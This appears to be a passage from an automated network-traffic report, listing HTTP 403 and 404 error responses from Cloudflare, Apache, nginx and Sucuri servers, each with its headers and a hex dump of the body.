                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:30 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G54zglYklfxFcbHXciJrj9ZPvtxPBUSxyBEOesgXtvvHondsUyLGWpW4mHx4lYZ7w7dROXe29wwIo%2BSMSx2FKnRVNZPw92yQV9dxTps2oxqj5b31mfg9luRRT8pJvY1E"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7a39d383667-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:30 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U91Nk%2BRMSvjO0uOP%2BvumTFNsnlYPFxQfYysrd%2FOR9Qy0qzYtFb22Ouh4D7%2BXlGpheC6gqQTu479I1Gi0ddQZFJeQIsFEMMi%2BNEWaWjPZE%2Fo9hSZuCT0fNp8Uy2s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7a3b96f924d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:44:30 GMTServer: ApacheContent-Length: 13Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 22 Mar 2023 04:44:31 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:44:31 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:44:31 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 699date: Wed, 22 Mar 2023 04:44:32 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 64 65 6e 69 65 64 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">403</h1><h2 style="margin-top:20px;font-size: 30px;">Forbidden</h2><p>Access to this resource on the server is den
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:32 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nR9yhWialW0PmrddTW4abZhESFXfu0KnFlqj2RJvUyKOlE1IMzpLZ63%2FK8UqcvG3%2FFe7ahUs%2Fe6%2Fm5bTCFgOxdF6Jw0K7ybocRTMShpMMhDl0IjsUthL6A8NYOEhgSM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7b0ad1f9c10-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:33 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CFpJ%2B0sUKE2Czxh5ZOG1MerLpAM5PXdpiuYxG7n7AHuloAzM%2FVlFu4BAAByUIYpm920i7jufpuPzXtFOmP0j53S0vqkauKgVZL%2BK7hrsHlC2D0EkeoIN0Zd%2FaUuWq34%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7b4581f9c10-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PIwGn0E6xKN8RxTlaZLkGiBN8zhK3xWyZWEA4C8%2FCrAZWTukWTjmacp4GgozlwVd%2BPhP7%2B2zV388GtEK94wEU%2BPSu1k3mEJKyVO4Cfj1WL0DnA2zr%2BjDjnSOo1RMykvn96I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7c518515c68-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:44:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:44:36 GMTContent-Type: text/htmlContent-Length: 0Connection: keep-aliveX-Powered-By: PleskLin
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:37 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 199Connection: keep-aliveServer: ApacheX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:37 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: yKskFaTI/RmB0yGOaMOo6Q==,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjc1veqNUXHRFwGw60H+O85,m0j2EEknGIVUW/liY8BLLugxpzo4Lzk5UB/xu5OzG7jJftmKrOReD3ukbbas4YDoX-Wix-Request-Id: 1679460277.2482420831993624104X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 